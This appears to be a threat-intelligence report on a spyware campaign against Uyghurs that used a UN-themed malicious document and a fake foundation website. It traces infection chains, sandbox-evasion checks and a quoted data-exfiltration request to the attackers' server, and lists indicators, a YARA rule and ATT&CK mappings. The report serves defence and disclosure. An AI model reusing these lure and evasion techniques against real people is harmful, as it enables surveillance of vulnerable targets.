# Uyghurs, a Turkic ethnic minority in China, targeted via fake foundations **[research.checkpoint.com/2021/uyghurs-a-turkic-ethnic-minority-in-china-targeted-via-fake-foundations/](https://research.checkpoint.com/2021/uyghurs-a-turkic-ethnic-minority-in-china-targeted-via-fake-foundations/)** May 27, 2021 May 27, 2021 ## Introduction During the past year, Check Point Research (CPR), in cooperation with Kaspersky’s GReAT, have been tracking an ongoing attack targeting a small group of Uyghur individuals located in Xinjiang and Pakistan. Considerable effort was put into disguising the payloads, whether by creating delivery documents that appear to be originating from the United Nations using up to date related themes, or by setting up websites for non-existing organizations claiming to fund charity groups. In this report, we examine the flow of both infection vectors and provide our analysis of the malicious artifacts we came across during this investigation, even though we were unable to obtain the later stages of the infection chain. ## Delivery Document Our investigation began with a malicious document named `UgyhurApplicationList.docx` (MD5: `a1d773621581981a94459bbea454cdf8 ), which carried the logo of the United` Nations Human Rights Council (UNHRC), and contained decoy content from a United ----- Nations general assembly discussing human rights violations. **Fig. 1 Delivery document carrying the UNHCR logo** After clicking on “Enable Editing”, a malicious external template is downloaded from ``` officemodel[.]org . This template has embedded VBA macro code, which then checks ``` the operating system’s architecture, and based on this proceeds to decode a 32-bit or a 64bit payload. **Fig. 2 Malicious macros checking the operating system version** The payloads are embedded in the document itself and are base64 encoded. After the corresponding version is decoded, it is then named `OfficeUpdate.exe and saved under` the `%TEMP% directory. In the two` `OfficeUpdate.exe samples we located, the payload` ----- was a shellcode loader which starts with basic evasion and anti-debugging techniques, by using functions such as sleep and `QueryPerformanceCounter .` The shellcode in both variants attempts to fetch a remote payload. In the first variant, we found the loaded shellcode attempted to connect to `185.94.189[.]207, where the second` variant tried to connect to `officemodel[.]org, even though it crashes during execution.` Unfortunately, we were not able to retrieve the next stage payload for analysis. ## Delivery Websites The domain observed in the malicious document ( officemodel[.]org ) resolved to the same IP address as `unohcr[.]org – a domain impersonating the Office of the United` Nations High Commissioner for Human Rights (OHCHR). This overlap in resolution happened over a long period of time, from April to December 2020. By pivoting on that infrastructure we were able to reveal another infection vector that was used in this operation: distribution through fake websites that host malicious executables targeting Windows users. **Fig. 3 Connection to additional domains** Another IP address that `unohcr[.]org resolved to revealed a domain named` ``` tcahf[.]org, which hosted a website claiming to represent TCAHF – the “Turkic Culture ``` and Heritage Foundation”. TCAHF is supposedly a private organization that funds and supports groups working for “Tukric culture and human rights”, when in truth it is a made up entity, and most of its website’s content is copied from the legitimate `opensocietyfoundations.org .` ----- **Fig. 4 Fake website (top) compared to the legitimate one** The malicious functionality of the TCAHF website is well disguised and only appears when the victim attempts to apply for a grant (see the added “Application” menu button in Fig. 4 above). The website then claims it must make sure the operating system is safe before entering sensitive information for the transaction, and therefore asks the victims to download a program to scan their environments. The website offers two download options, one for MacOS and one for Windows, but only Windows programs were available when we analyzed the website, and the MacOS version link served an empty file. ----- **Fig. 5 Links to download a fake security scanner** ## Malware implants During 2020, the fake TCAHF website served at least two variants of the Windows implants: one we refer to as `WebAssistant which was available in May 2020, and another called` ``` TcahfUpdate which was available in October 2020. ### Fake Website Infection Chain ``` The first payload we observed being downloaded from `tcahf[.]org was called` `win.exe .` This payload is an Installshield package that executes a Windows Installer (MSI) file that installs the `WebAssistant application and drops four files.` ----- **Fig. 6 Execution flow of the WebAssistant application** The installer also registers a URL protocol handler for the `sechk scheme: whenever a user` is redirected to a URL which starts with `sechk:// (instead of` `https:// for example),` ``` WebAssistant.exe will be executed. ``` **Fig. 7 Registry value to handle “sechk” scheme under HKCR** ----- This scheme appears in the source of the TCAHF website, and when the victim accesses different pages, a pop-up message asking to run the `WebAssistant application is shown:` **Fig. 8 A pop up to run WebAssistant due to the presence of “sechk” scheme** ### WebAssistant analysis Unlike most malicious samples, `WebAssistant does not attempt to conceal itself or hide its` execution from the victim, as it is allegedly a security scanner that is required for the application process in the website to work. The `WebAssistant installer creates four files,` three of which were compiled by the attackers on May 21st, 2020. The files are saved under the `C:\Program Files\WebAssistant\SecurityScan directory:` **File Name** **MD5** **Description** WebAssistant.exe 2f7492423586a3061e5641b5b271ca54 .NET binary WindowsService.exe 98cf461bcf9e3cef2869e2ea3d7f3341 .NET binary WinInterface.dll 65532ef9879d6b86a865d3e2b0621354 C++ library Newtonsoft.Json.dll 6815034209687816d8cf401877ec8133 Legitimate library used to parse JSON objects ----- The main executable ( WebAssistant.exe ) has a graphical interface that is shown as a decoy to the victims, potentially allowing them to conduct the fake scan: **Fig. 9 WebAssistant’s user interface** When the victim presses the `Scan button, the` `ThreadScanSystem method in the .NET` binary is called. Unlike what its name suggests, this method does not really scan the system for security issues, but instead displays hardcoded strings informing the victim that everything is in order while it performs other actions in the background: **Fig. 10 Messages shown to the victim during the fake scan** First, `ThreadScanSystem calls the` `CheckUpdate method and sends a` `GET request to` the C2 server along with the following parameters ``` action=update&app=WebAssistant/1.0&db=Database/1.0, and the server returns a ``` JSON object: ----- **Fig. 11 Communicating with the C2 server to check for pending updates** The JSON object is then parsed for certain fields such as `appurl or` `dburl . The` `appurl` field contains a URL to download another executable called `Setup.exe, which is then` saved to the `TEMP directory. After downloading` `Setup.exe,` `WebAssistant runs it and` displays its graphical component to the victim. **Fig. 12 Downloading and running Setup.exe** On the other hand, the `dburl field in the JSON object contains a URL to download a library` called `WinDBProject.dll . This library exports three functions that are loaded by the` ``` WebAssistant binary: getWinDBVersion, winDBCheckVmProcess, and winDBCheckConflicts . ``` **Fig. 13 Importing functions from the downloaded DLL** By default, those three functions are loaded from the WinInterface.dll library created by the installer, however each exported function in `WinInterface.dll is simply a wrapper` designed to execute a function with the same name in `WinDBProject.dll . This means` that without the additional downloaded DLL, the functions in `WinDBProject.dll do not` contain any logic of their own and we cannot see the full implementation. Unfortunately, we were unable to obtain both `WinDBProject.dll and` `Setup.exe .` ----- **Fig. 14 Wrapper functions in WinInterface.dll** Following this, `WebAssistant.exe proceeds to collect the following information about the` infected system: the BIOS serial number, CPU information, and MAC address. It also collects a list of the running processes and a list of the installed programs. It is interesting to note that when the `WebAssistant application enumerates the running processes, it calls the winDBCheckVmProcess function imported from the downloaded DLL. The name of this function suggests that its purpose is to check if the result contains any processes associated with virtual machines, which might mean the malware is running in an emulated environment or by a researcher. In an attempt to evade detection, the attackers then stop the execution after displaying a message that the program cannot run inside a virtual machine. **Fig. 15 Checking if the application is running inside a virtual machine** Similarly, the list of installed programs is examined by the imported `winDBCheckConflicts` function to check for the existence of certain software on the system, and stop the execution if it is found. Although we do not know which programs are sought by ``` winDBCheckConflicts, it is possible the attackers use it to evade AntiVirus solutions and ``` security products that might otherwise detect the presence of their malicious activity. If no problematic process or software is encountered, the collected information (system information list, processes list, installed programs list) is then uploaded to the C2 server. Each one of the lists is encoded using base64, and added to a JSON object that is sent to ``` tcahf[.]org/verify_.php?flag=false via a POST request. ``` ----- POST hxxps://tcahf[.]org/verify_/.php?flag=false HTTP/1.1 User-Agent: WebAssistant/1.0 Host: tcahf[.]org Content-Length: 28397 {“Process”: [REDACTED], “Soft”: [REDACTED], “Uid”: [REDACTED]} **Fig. 16 Uploading the collected data to the C2 server** Alternatively, if the `WebAssistant application is executed as a result of the registered URL` scheme `sechk, the execution flow is quite similar to the one we already described. The` main function checks if a `load argument was provided ( sechk://load ), and if so calls` two methods: `initApp and` `globalScan . The` `globalScan method exfiltrates the same` system information seen above, whereas the `initApp schedules a` `Timer to collect and` upload this data every half an hour. **Fig. 17 Timed event to exfiltrate system information** Lastly, another binary dropped by this installer is `WindowsService.exe, which is a service` that ensures the persistence of the malicious functionality and performs the same actions as ``` WebAssistant.exe periodically. ### TcahfUpdate Analysis TcahfUpdate replaced the previous WebAssistant implant and was available for ``` download from the fake website during October 2020. `TcahfUpdate is composed of three` files: two are .NET executables created by the attackers and compiled in September 2020, while the third is a legitimate DLL library. **Name** **MD5** **Description** RegisterUi.exe 1b5dbd351bb7159eb08868c46a3fe3a6 .NET binary TcahfUpdateSvr.exe 90fcbd5c904326466c3b6af1ca34aae1 .NET binary ----- Newtonsoft.Json.dll 6815034209687816d8cf401877ec8133 Legitimate library used to parse JSON objects registration code to be used in the TCAHF website. Behind the scenes however, it behaves in a similar manner to the previously described `WebAssistant variant.` `RegisterUI.exe` is the user interface of the `TcahfUpdate application, when the UI is loaded it triggers the` collection of system information in the background, with some changes introduced from the older version. **Fig. 18 User interface of RegisterUi.exe** For example, in addition to the BIOS serial number, CPU information, and MAC address, this variant also adds the local system time to the stolen data. The data is then encrypted using AES with the encryption key `A4DC55FAC1E4E512C07C1504FDC9B668, and is uploaded to` the C2 server by appending it to the following URL: ``` hxxps://www.tcahf[.]org/verify_.php?uuid= . The encrypted data is also used to ``` generate the registration code displayed to the victim in the UI. **Fig. 19 Encrypting the stolen data using the “uuidEncode” method** As for the second executable, `TcahfUpdateSvr.exe is a windows service that makes sure` the malicious code is constantly running. It assigns `RegisterUI.exe to be the handler of` the `tcahf:// protocol, so that it could be executed whenever the victim accesses a URL` that begins with this scheme ----- Moreover, it can fetch an additional payload by communicating with the C2 server using the ``` hxxps://www.tcahf[.]org/cgi-bin/update.py?uuid=[DATA] URL along the user agent Certificate Update(For Windows)/1.0 . As with the previous variant, the result from ``` this request is a JSON object that may contain the `Setup.exe executable. The executable` is saved under the `%TEMP% directory and executed with admin privileges:` **Fig. 20 Downloading and running Setup.exe** ## Victims Due to the nature of the malicious websites and the decoy content used in the delivery document, we can assess this campaign is intended to target the Uyghur minority or organizations supporting them. Our telemetry supported this assessment, as we have identified only a handful of victims in Pakistan and China. In both cases, the victims were located in regions mostly populated by the Uyghur minority. ## Attribution Although we were unable to find code or infrastructure similarities to a known threat group, we attribute this activity, with low to medium confidence, to a Chinese-speaking threat actor. When examining the malicious macros in the delivery document, we noticed that some [excerpts of the code were identical to VBA code that appeared in multiple Chinese forums,](https://www.office-cn.net/access-function/338.mhtml) and might have been copied from there directly. ----- **Fig. 21 Similar macro code in Chinese forum** ## Recent Updates While most of the activity described above happened during 2020, it appears the threat actor behind this campaign is still active in 2021, with two newly registered domains: ``` malaysiatcahf[.]org and icislieri[.]com . These two domains resolved to the same ``` IP address as `officemodel[.]org, and the server responded only to the unique URLs we` have previously observed in this campaign, further confirming the connection to this threat actor. The second domain ( icislieri[.]com ) appears to be impersonating the Turkish Ministry of the Interior, but currently both domains redirect to the website of a Malaysian government body called the “Terengganu Islamic Foundation”. This suggests that the attackers are pursuing additional targets in countries such as Malaysia and Turkey, although they might still be developing those resources as we have not yet seen any malicious artifacts associated with those domains. ## Conclusion Our joint analysis of this previously unreported threat group, which first emerged in early 2020, shows an elaborate attack that has been taking advantage of different infection vectors to target supporters and members of the Uyghur minority. ----- The malicious executables created by the attackers exfiltrate basic information about the infected system, but can also download a second-stage payload, or in the case of the documents, fetch additional commands from the C2 server. This means that we have not yet seen all the capabilities of this malware, or the full course of action taken by the attackers following a successful infection. Lastly, the fact that the attackers are still registering domains indicates this activity is still ongoing, and there might be new sightings or new variants of the malware in the near future. ## Indicators of Compromise **Malicious documents** ``` 0f104af8eb3ab1a192d9d8793c405483 a1d773621581981a94459bbea454cdf8 c5d5f37a0a599ee790172630a2501f96 ``` **Malicious embedded PE** ``` b343e06f20f178117be130f082e23eab b808ab4dfc1c52e5be07e6815cf09d40 edcefd70f93bf00849e336ea13a258f7 ``` **Fake applications** ``` f538754efdc17e9ba88aeb1ff31ecdcb 2f7492423586a3061e5641b5b271ca54 98cf461bcf9e3cef2869e2ea3d7f3341 65532ef9879d6b86a865d3e2b0621354 90fcbd5c904326466c3b6af1ca34aae1 1b5dbd351bb7159eb08868c46a3fe3a6 ``` **Domains and IPs** ``` tcahf[.]org unohcr[.]org malaysiatcahf[.]org officemodel[.]org icislieri[.]com 185.198.166[.]58 45.134.1[.]3 47.91.170[.]222 46.8.180[.]147 ## Appendix B: Yara Rules ``` ----- ``` rule apt_WebAssistant_TcahfUpdate { meta: description = "Rule for detecting the fake WebAssistant and TcahfUpdate applications used to target the Uyghur minority" version = "1.0" last_modified = "2021-05-06" hash = "2f7492423586a3061e5641b5b271ca54" hash = "1b5dbd351bb7159eb08868c46a3fe3a6" hash = "90fcbd5c904326466c3b6af1ca34aae1" strings: $url = {2f 00 63 00 67 00 69 00 2d 00 62 00 69 00 6e 00 2f [0-50] 2e 00 70 00 79 00 3f 00} $lib = "Newtonsoft.Json" $mac = "MACAddress Is Not NULL" wide condition: uint16(0)==0x5A4D and $url and $lib and $mac and filesize < 1MB } ## Appendix C: MITRE ATT&CK ``` **Tactic** **Technique** **Technique Name** Resource Development T1583.001 T1587.001 Acquire Infrastructure: Domains Develop Capabilities: Malware Initial Access T1566.001 Phishing: Spearphishing Attachment Execution T1204.002 T1569.002 User Execution: Malicious File System Services: Service Execution Persistence T1053 Scheduled Task/Job Defense Evasion T1140 Deobfuscate/Decode Files or Information Discovery T1082 T1518 T1057 Command and Control T1071.001 T1573.001 System Information Discovery Software Discovery Process Discovery Application Layer Protocol: Web Protocols Encrypted Channel: Symmetric Cryptography Exfiltration T1041 Exfiltration Over C2 Channel -----